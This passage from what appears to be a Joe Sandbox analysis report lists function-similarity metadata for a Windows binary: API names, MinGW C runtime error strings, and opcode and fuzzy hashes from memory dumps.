                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastProtectVirtual
                                                                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                              • API String ID: 1672467334-2123141913
                                                                                                              • Opcode ID: d7a7c433264d073652459f1efc7dd244941dff9229673401627952973cab804b
                                                                                                              • Instruction ID: 17cb4702637e926009632070c598bd489aeacd7a90d6e9aaa35b7f5bafe8a369
                                                                                                              • Opcode Fuzzy Hash: d7a7c433264d073652459f1efc7dd244941dff9229673401627952973cab804b
                                                                                                              • Instruction Fuzzy Hash: CA31E032B096528AFF918B58EC8027973B0AB41765F544132EE0D832DAEF3CE485C301
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: malloc$abortmemcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4174897659-0
                                                                                                              • Opcode ID: 5e5bb2cf4d9c3c4d876d0ff22177a5b2a264f996ea93ff18372be3af28f56bb7
                                                                                                              • Instruction ID: 64c51cb20540361204ac76778cc1af74cc6bd0725789d31731c85ee4f8c11780
                                                                                                              • Opcode Fuzzy Hash: 5e5bb2cf4d9c3c4d876d0ff22177a5b2a264f996ea93ff18372be3af28f56bb7
                                                                                                              • Instruction Fuzzy Hash: 5101E563F0A64840ED889B5AFD805F95254EB58FD0F688531CE0D5B3CBEE3CE9818341
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeavecalloc
                                                                                                              • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                              • API String ID: 876395260-799109717
                                                                                                              • Opcode ID: 4ff5a429f7bb52d97923efcb833318747879128de8ecd7909eaa28fbfea8a9ea
                                                                                                              • Instruction ID: 2c0f6ba5592dfd1010be247703eb8c4efb67c9077bd719ad628c309f4de22265
                                                                                                              • Opcode Fuzzy Hash: 4ff5a429f7bb52d97923efcb833318747879128de8ecd7909eaa28fbfea8a9ea
                                                                                                              • Instruction Fuzzy Hash: ED012735B0D60685FF508B9DFDC02B523A4AF48781F884032D90DC37EAEE2CA9858302
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • Unknown pseudo relocation protocol version %d., xrefs: 00007FF624AC5562
                                                                                                              • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF624AC5553
                                                                                                              • Unknown pseudo relocation bit size %d., xrefs: 00007FF624AC553A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                              • API String ID: 544645111-1286557213
                                                                                                              • Opcode ID: dc83335a3dadcf2524c3e82afb01ea5867741f387cfdd7ee093d0d9eb9ede651
                                                                                                              • Instruction ID: 716c208c30336eb706d2eaf85e3f548aa743fbf389b44cf26eb04cd4bb70f809
                                                                                                              • Opcode Fuzzy Hash: dc83335a3dadcf2524c3e82afb01ea5867741f387cfdd7ee093d0d9eb9ede651
                                                                                                              • Instruction Fuzzy Hash: F8713522F1862285FFA08B25DD902BD62A1BF45B94FA44136ED1D8B7CEDE3CE441C742
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Byte$CharLeadMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 2561704868-0
                                                                                                              • Opcode ID: c24187cac5bff1d128cefd9ff085609a07eddebf6e59efd4b59ea4d86880635e
                                                                                                              • Instruction ID: b33796944181f1fb75751caad893a205f5b77dbee2cea3841eb270abec9e5506
                                                                                                              • Opcode Fuzzy Hash: c24187cac5bff1d128cefd9ff085609a07eddebf6e59efd4b59ea4d86880635e
                                                                                                              • Instruction Fuzzy Hash: 1131DA72A0E28186EBA04B35FC803AD7694BB80794F648135DA98CB7DECF3ED545CB01
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscpywcslen
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 3616488086-4108050209
                                                                                                              • Opcode ID: a089d481bb0ba34a1f914aa8b111dfa0ee7132c7b95d24ac31943bd9d82a9655
                                                                                                              • Instruction ID: f7ddbf963bc01bf7e56958fba0f778005531db6cdd0d36019d01f671c69e6e84
                                                                                                              • Opcode Fuzzy Hash: a089d481bb0ba34a1f914aa8b111dfa0ee7132c7b95d24ac31943bd9d82a9655
                                                                                                              • Instruction Fuzzy Hash: CE11082162D69481EB90C710F8803ABA620EFC47A4F640331FA9D47BDADF3EC5468740
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocCreateErrorLastSemaphoreabort
                                                                                                              • String ID:
                                                                                                              • API String ID: 4146797221-0
                                                                                                              • Opcode ID: 3df8b29197056a77df859586d79f1bf4d15e061451aadde36ef3289c2aa43424
                                                                                                              • Instruction ID: 45d1cd65c085cd5a9a8a4b3356d9bd94a0e67691462271d0f3f6a24758362c5b
                                                                                                              • Opcode Fuzzy Hash: 3df8b29197056a77df859586d79f1bf4d15e061451aadde36ef3289c2aa43424
                                                                                                              • Instruction Fuzzy Hash: E1F08C70F0960386FE94EBBCFCC903422B56F05752F600236D42DC66EBEF2CA0058202
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_wgetenvwcscpywcslen
                                                                                                              • String ID: 99C
                                                                                                              • API String ID: 753804109-3786687225
                                                                                                              • Opcode ID: 71c07efdc79aebdea6522560dccd04e8f814d5b7c59df900f806ae06d1258af1
                                                                                                              • Instruction ID: 49df3c8865bc88c929d133e54a5a6cebd7817f05b89e5546e3b1bb80bcf064a8
                                                                                                              • Opcode Fuzzy Hash: 71c07efdc79aebdea6522560dccd04e8f814d5b7c59df900f806ae06d1258af1
                                                                                                              • Instruction Fuzzy Hash: 5B41D632A0978585EF91CB2AE88436A77A4FB55B84F148035EE8D877DAEF7CD041C742
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-3474627141
                                                                                                              • Opcode ID: bec2a2abb497f7a81624d47846920bd0d53a5862057e49c32a94b49e0e59a488
                                                                                                              • Instruction ID: 6b36460b60bd4dddb6704ba1ac17a01b1227bcae680f35a96dd70368d763310d
                                                                                                              • Opcode Fuzzy Hash: bec2a2abb497f7a81624d47846920bd0d53a5862057e49c32a94b49e0e59a488
                                                                                                              • Instruction Fuzzy Hash: F401E562908E88C5EA528F1CE8411EA7374FF9975AF245321EB8C262A5DF2AD543C700
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-2468659920
                                                                                                              • Opcode ID: 9c1f99675411f496ebae98d8a9fd8c25414099954248e06b923c836f49d44bcd
                                                                                                              • Instruction ID: 2a83553ed3a48f13067e1083ad018826817f11ec6d15bbc47c9fbcb8d826509b
                                                                                                              • Opcode Fuzzy Hash: 9c1f99675411f496ebae98d8a9fd8c25414099954248e06b923c836f49d44bcd
                                                                                                              • Instruction Fuzzy Hash: 2DF06253908E8881D652CF2CE8401EBB374FF4D789F295326EB8D7A165DF29D6438704
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-4283191376
                                                                                                              • Opcode ID: 14e8c9abfb476ad18acf1c5e7f73d1f4829812003753d9a42390f774e7430cee
                                                                                                              • Instruction ID: fe552b7230a4e116be59cfc4a3ab191a5fe9cfada907acc6b7c5dc9bb6bfbc02
                                                                                                              • Opcode Fuzzy Hash: 14e8c9abfb476ad18acf1c5e7f73d1f4829812003753d9a42390f774e7430cee
                                                                                                              • Instruction Fuzzy Hash: 88F06813908E4481D651CF1CE8401EBB374FF4D789F255326EB8D361A5DF29D5438704
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-4273532761
                                                                                                              • Opcode ID: 07577753afb37eb5fcf5d63ae4e73adc70741b58ff7b1f344ad0f27d0edc3f3e
                                                                                                              • Instruction ID: edbbc90dbb1662fcea9a3e4f2fd7806364630df4fab518da3a679d21de8aaa2d
                                                                                                              • Opcode Fuzzy Hash: 07577753afb37eb5fcf5d63ae4e73adc70741b58ff7b1f344ad0f27d0edc3f3e
                                                                                                              • Instruction Fuzzy Hash: 0CF04F22908E8881D652CF2CE8401EBA374FF4D789F295326EA892A565DF29D6428704
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-2187435201
                                                                                                              • Opcode ID: eecb8fa550eb4f9658770f2b61e2844a682bd80113327cf1eeee3b9a414239df
                                                                                                              • Instruction ID: c426b73f443ff354dddddb9288839c746e7f09b0684d2a04d846c38ef57312b6
                                                                                                              • Opcode Fuzzy Hash: eecb8fa550eb4f9658770f2b61e2844a682bd80113327cf1eeee3b9a414239df
                                                                                                              • Instruction Fuzzy Hash: 9AF06213908E8885D652CF2CE8401EBB374FF4D79AF295326EB8D3A1A5DF29D6438704
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-4064033741
                                                                                                              • Opcode ID: 45e8a70f94a185c31541e1e23cfc07f2a2f839ba251156f79789ed1c5b7c23f7
                                                                                                              • Instruction ID: 36590d4bbbb80e5f4dad09b97498c2202d53ea13f1095b74b175fe275e8e6466
                                                                                                              • Opcode Fuzzy Hash: 45e8a70f94a185c31541e1e23cfc07f2a2f839ba251156f79789ed1c5b7c23f7
                                                                                                              • Instruction Fuzzy Hash: 0AF06213908E8881D652CF2CE8401EBB374FF4D78AF295326EB8D3A1A5DF29D6438704
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-2713391170
                                                                                                              • Opcode ID: ccf22da0147750aef5dc2870aa310f6cc427e2b221e0b1b15f399e3b2fc4dc88
                                                                                                              • Instruction ID: 2f7c2d7b6a0bb30353081acf3ee1b2a8bade68961e95e042642ffc744cfc8331
